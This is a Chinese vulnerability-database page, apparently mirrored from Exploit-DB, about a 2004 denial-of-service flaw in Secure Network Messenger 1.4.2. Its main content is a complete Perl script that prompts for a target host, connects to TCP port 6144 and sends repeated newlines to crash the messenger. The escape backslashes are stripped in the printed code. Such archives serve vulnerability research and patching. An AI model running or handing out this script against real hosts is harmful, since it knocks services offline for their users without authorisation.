Secure Network Messenger 1.4.2 – Denial of Service

Secure Network Messenger 1.4.2 – Denial of Service

漏洞ID 1054754 漏洞类型
发布时间 2004-11-15 更新时间 2004-11-15
图片[1]-Secure Network Messenger 1.4.2 – Denial of Service-安全小百科CVE编号 N/A
图片[2]-Secure Network Messenger 1.4.2 – Denial of Service-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/634
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/usr/bin/perl

use IO::Socket;
print ("nSecure Network Messenger Crasher by ClearScreenn");
print ("nEnter host to crash: ");
$h = <STDIN>;
chomp $h;
$socks = IO::Socket::INET->new(
        Proto => "tcp",
        PeerPort => "6144",
        PeerAddr => "$h"
) or die "nNo response from host.";

sleep 1;
print "nSuccesfully connected to $h!n";
for ($count=1; $count<15; $count++)
{
 print $socks "n";
 select(undef, undef, undef, 0.1);
}
print "nMessenger crashed.";
close $socks;

# milw0rm.com [2004-11-15]

相关推荐: Agnitum Outpost Firewall Remote Denial of Service Vulnerability

Agnitum Outpost Firewall Remote Denial of Service Vulnerability 漏洞ID 1098439 漏洞类型 Failure to Handle Exceptional Conditions 发布时间 20…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享